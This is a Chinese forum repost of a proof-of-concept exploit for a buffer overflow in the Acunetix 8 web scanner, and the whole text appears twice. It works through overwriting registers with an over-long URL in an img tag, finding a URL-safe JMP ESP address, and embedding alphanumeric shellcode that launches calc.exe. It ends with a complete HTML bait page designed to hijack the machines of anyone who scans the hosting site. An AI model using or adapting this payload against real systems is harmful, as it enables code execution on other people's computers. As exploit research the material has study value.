-
-
转帖:Acunetix 0day
-
发表于: 2014-12-10 21:44
-
很多网站管理员抱怨大部分对网站的扫描是由自动工具像NESSUS, ACUNETIX, and APPSCAN完成的。
今天的0DAY就是针对世界最著名的网站扫描工具之一ACUNETIX。
POC对应ACUNETIX 8(build 20120704,因为网上流传最多的破解版本,很多newbie hackers用它)。
本文不仅揭示了一个新的漏洞,而且让你在应对外部攻击时有一个新的思路。
不是一次又一次的保护你的网站,或者买一款新的先进的WAF(web application firewall),让我们给攻击者一个害怕的理由,让他们在点下“scan”按钮时手上抖三抖。
在这篇文章里,我不会给一个对所有的扫描方案都有效的exploit,也不适用于所有操作系统,只是一个POC,希望能为研究渗透测试工具的漏洞做出努力。
Let's go!!!
当我们用ACUNETIX扫描网站时,如果网站的源码里有外部相关域,像
“<img src=http://externalSource.com/someimg.png >”
“<a href=http://externalSource.com/ ></a>”
等等。。。工具会把它添加到向导里。
如果其中一个外部域名的长度大于268个字节,ACUNETIX就会崩溃。
构造源文件,
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>
在Immunity Debugger调试发现,EDX被fuzzing字符串覆盖,引发访问冲突。
尽管接下来是运行在SEH,但是我不建议利用它,因为我试了好几天也没有成功(SEH安全机制)。
这里有一个问题,ASCII。ACUNETIX是从URL里得到外部域的,所以字符串会被转换成对浏览器友好的形式。像这样
0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) 等等。。。
URL字符串只接受可打印的字母数字字符和被URL转换过的特殊字符,如果外部源中有特殊字符,会被转换成%形式,举个栗子:
引号(")被转换成%22,在内存中就是253232。百分号(%)在内存中就是253235。
为了绕过它,exploit就只能用"A-Z, a-z, 1-0" 和不被URL转换的"! ( ) = } { " ,这可不是简单的活。。。
简而言之,不得不找到一种方法改变程序的流程来避开SEH,因为只用URL ASCII字符是不可能避开SEH安全保护的。
最后找到一种方法,覆盖EDX为一个可读的内存地址,不要忘记是EDX-8,
MOVE ECX, DWORD PTR DS: [EDX-8];
意思是不管我们要用哪个地址,都要加上8,然后祈祷它能转换成可打印的URL字符串。
一路跋山涉水,终于找到一个地址,貌似可以满足要求。
“0x663030XX”--> " f005 "
EDX就被268字节覆盖,so,构造exploit:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
运行ACUNETIX,并调试
可以看到EIP被覆盖。
由此可见,我们上面的思路是可行的,因为我们可以控制EIP。
剩下的就是EAX和ESP的选择,从两个方面考虑:
1、ESP直接指向shell开始的位置。
2、可以写shell的空间更大。
最后我选择了ESP,在内存中找 “JMP ESP”指令,别忘了要可以被转换成URL字符串。
一路跋山涉水,找到一个地址0x7e79515d (SXS.DLL)转换成ASCII "]Qy~ "。
构造exploit,
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
OK,运行调试。
Yea…
最后就是shellcode的生成,可以用Metasploit中有一个叫Alphanumeric Shell的payload。
下面是一大堆关于shellcode的注意事项,省略N字。。。
作者生成了一个简单的calc.exe的shellcode,exploit如下:
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
注意只能在windows xp下运行。
此0DAY还需要newbie hackers的配合才能正常工作,具体就是在ACUNETIX wizard的时候要选上Additional hosts detected。。。
为了勾引hackers,这样构造
<html> <img src="http://SQLInjection........................................ ..................................................................... ..................................................................... ............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src="http://XSS................................................. ..................................................................... ..................................................................... ...">
<img src="http://CSRF................................................ ..................................................................... ..................................................................... ....">
<img src="http://DeepScan............................................ ..................................................................... ..................................................................... ........">
<img src="http://NetworkScan......................................... ..................................................................... ..................................................................... ...........">
<img src="http://DenialOfService..................................... ..................................................................... ..................................................................... ...............">
</html>
总结,我们成功构造了一个让newbie hackers自动献上菊花的exploit,到时候,鞭笞,滴蜡随你所愿。。。
ps.编辑器用不好 贴个传送门http://bbs.blackbap.org/forum.php?mod=viewthread&tid=5797
今天的0DAY就是针对世界最著名的网站扫描工具之一ACUNETIX。
POC对应ACUNETIX 8(build 20120704,因为网上流传最多的破解版本,很多newbie hackers用它)。
本文不仅揭示了一个新的漏洞,而且让你在应对外部攻击时有一个新的思路。
不是一次又一次的保护你的网站,或者买一款新的先进的WAF(web application firewall),让我们给攻击者一个害怕的理由,让他们在点下“scan”按钮时手上抖三抖。
在这篇文章里,我不会给一个对所有的扫描方案都有效的exploit,也不适用于所有操作系统,只是一个POC,希望能为研究渗透测试工具的漏洞做出努力。
Let's go!!!
当我们用ACUNETIX扫描网站时,如果网站的源码里有外部相关域,像
“<img src=http://externalSource.com/someimg.png >”
“<a href=http://externalSource.com/ ></a>”
等等。。。工具会把它添加到向导里。
如果其中一个外部域名的长度大于268个字节,ACUNETIX就会崩溃。
构造源文件,
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>
在Immunity Debugger调试发现,EDX被fuzzing字符串覆盖,引发访问冲突。
尽管接下来是运行在SEH,但是我不建议利用它,因为我试了好几天也没有成功(SEH安全机制)。
这里有一个问题,ASCII。ACUNETIX是从URL里得到外部域的,所以字符串会被转换成对浏览器友好的形式。像这样
0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) 等等。。。
URL字符串只接受可打印的字母数字字符和被URL转换过的特殊字符,如果外部源中有特殊字符,会被转换成%形式,举个栗子:
引号(")被转换成%22,在内存中就是253232。百分号(%)在内存中就是253235。
为了绕过它,exploit就只能用"A-Z, a-z, 1-0" 和不被URL转换的"! ( ) = } { " ,这可不是简单的活。。。
简而言之,不得不找到一种方法改变程序的流程来避开SEH,因为只用URL ASCII字符是不可能避开SEH安全保护的。
最后找到一种方法,覆盖EDX为一个可读的内存地址,不要忘记是EDX-8,
MOVE ECX, DWORD PTR DS: [EDX-8];
意思是不管我们要用哪个地址,都要加上8,然后祈祷它能转换成可打印的URL字符串。
一路跋山涉水,终于找到一个地址,貌似可以满足要求。
“0x663030XX”--> " f005 "
EDX就被268字节覆盖,so,构造exploit:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
运行ACUNETIX,并调试
可以看到EIP被覆盖。
由此可见,我们上面的思路是可行的,因为我们可以控制EIP。
剩下的就是EAX和ESP的选择,从两个方面考虑:
1、ESP直接指向shell开始的位置。
2、可以写shell的空间更大。
最后我选择了ESP,在内存中找 “JMP ESP”指令,别忘了要可以被转换成URL字符串。
一路跋山涉水,找到一个地址0x7e79515d (SXS.DLL)转换成ASCII "]Qy~ "。
构造exploit,
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
OK,运行调试。
Yea…
最后就是shellcode的生成,可以用Metasploit中有一个叫Alphanumeric Shell的payload。
下面是一大堆关于shellcode的注意事项,省略N字。。。
作者生成了一个简单的calc.exe的shellcode,exploit如下:
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
注意只能在windows xp下运行。
此0DAY还需要newbie hackers的配合才能正常工作,具体就是在ACUNETIX wizard的时候要选上Additional hosts detected。。。
为了勾引hackers,这样构造
<html> <img src="http://SQLInjection........................................ ..................................................................... ..................................................................... ............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src="http://XSS................................................. ..................................................................... ..................................................................... ...">
<img src="http://CSRF................................................ ..................................................................... ..................................................................... ....">
<img src="http://DeepScan............................................ ..................................................................... ..................................................................... ........">
<img src="http://NetworkScan......................................... ..................................................................... ..................................................................... ...........">
<img src="http://DenialOfService..................................... ..................................................................... ..................................................................... ...............">
</html>
总结,我们成功构造了一个让newbie hackers自动献上菊花的exploit,到时候,鞭笞,滴蜡随你所愿。。。
ps.编辑器用不好 贴个传送门http://bbs.blackbap.org/forum.php?mod=viewthread&tid=5797
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
